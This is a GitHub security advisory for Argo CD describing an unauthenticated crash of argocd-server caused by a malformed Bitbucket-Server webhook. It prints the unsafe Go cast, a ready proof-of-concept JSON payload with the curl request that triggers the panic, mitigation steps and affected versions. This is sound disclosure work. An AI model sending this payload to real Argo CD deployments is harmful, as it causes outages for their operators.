GHSA-f9gq-prrc-hrhc

Suggest an improvement
Source
https://github.com/advisories/GHSA-f9gq-prrc-hrhc
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-f9gq-prrc-hrhc/GHSA-f9gq-prrc-hrhc.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-f9gq-prrc-hrhc
Aliases
Downstream
Published
2025-09-30T18:11:59Z
Modified
2025-10-01T21:37:13Z
Severity
  • 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVSS Calculator
Summary
Unauthenticated argocd-server panic via a malicious Bitbucket-Server webhook payload
Details

Summary

Unpatched Argo CD versions are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients.

With the default configuration, no webhook.bitbucketserver.secret set, Argo CD’s /api/webhook endpoint will crash the entire argocd-server process when it receives a Bitbucket-Server push event whose JSON field repository.links.clone is anything other than an array.

A single unauthenticated curl request can push the control-plane into CrashLoopBackOff; repeating the request on each replica causes a complete outage of the API.

Details

// webhook.go (Bitbucket-Server branch in affectedRevisionInfo)

for _, l := range payload.Repository.Links["clone"].([]any) {   // <- unsafe cast
    link := l.(map[string]any)
    ...
}

If links.clone is a string, number, object, or null, the first type assertion panics: interface conversion: interface {} is string, not []interface {}

The worker goroutine created by startWorkerPool lacks a recover, so the panic terminates the whole binary.

PoC

Save as payload-panic.json - note the non-array links.clone.

{
  "eventKey": "repo:refs_changed",
  "repository": {
    "name": "guestbook",
    "fullName": "APP/guestbook",
    "links": { "clone": "boom" }
  },
  "changes": [ { "ref": { "id": "refs/heads/master" } } ]
}
curl -k -X POST https://argocd.example.com/api/webhook \
     -H 'X-Event-Key: repo:refs_changed' \
     -H 'Content-Type: application/json' \
     --data-binary @payload-panic.json

Observed crash (argocd-server restart):

panic: interface conversion: interface {} is string, not []interface {}
goroutine 192 [running]:
github.com/argoproj/argo-cd/v3/server/webhook.affectedRevisionInfo
    webhook.go:209 +0x1218
...

Mitigation

If you use Bitbucket Server and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.

If you do not use Bitbucket Server, you can set the webhook secret to a long, random value to effectively disable webhook handling for Bitbucket Server payloads.

apiVersion: v1
kind: Secret
metadata:
  name: argocd-secret
type: Opaque
data:
+  webhook.bitbucketserver.secret: &lt;your base64-encoded secret here>

For more information

Credits

Discovered by Jakub Ciolek at AlphaSense.

Database specific
{
    "cwe_ids": [
        "CWE-703"
    ],
    "nvd_published_at": "2025-10-01T21:16:43Z",
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-30T18:11:59Z"
}
References

Affected packages

Go

github.com/argoproj/argo-cd

Package

Name
github.com/argoproj/argo-cd
View open source insights on deps.dev
Purl
pkg:golang/github.com/argoproj/argo-cd

Affected ranges

Type
SEMVER
Events
Introduced
1.2.0
Last affected
1.8.7

github.com/argoproj/argo-cd/v2

Package

Name
github.com/argoproj/argo-cd/v2
View open source insights on deps.dev
Purl
pkg:golang/github.com/argoproj/argo-cd/v2

Affected ranges

Type
SEMVER
Events
Introduced
2.0.0-rc1
Fixed
2.14.20

Database specific

{
    "last_known_affected_version_range": "<= 2.14.19"
}

github.com/argoproj/argo-cd/v3

Package

Name
github.com/argoproj/argo-cd/v3
View open source insights on deps.dev
Purl
pkg:golang/github.com/argoproj/argo-cd/v3

Affected ranges

Type
SEMVER
Events
Introduced
3.2.0-rc1
Fixed
3.2.0-rc2

Affected versions

3.*

3.2.0-rc1

github.com/argoproj/argo-cd/v3

Package

Name
github.com/argoproj/argo-cd/v3
View open source insights on deps.dev
Purl
pkg:golang/github.com/argoproj/argo-cd/v3

Affected ranges

Type
SEMVER
Events
Introduced
3.1.0-rc1
Fixed
3.1.8

Database specific

{
    "last_known_affected_version_range": "<= 3.1.7"
}

github.com/argoproj/argo-cd/v3

Package

Name
github.com/argoproj/argo-cd/v3
View open source insights on deps.dev
Purl
pkg:golang/github.com/argoproj/argo-cd/v3

Affected ranges

Type
SEMVER
Events
Introduced
3.0.0-rc1
Fixed
3.0.19

Database specific

{
    "last_known_affected_version_range": "<= 3.0.18"
}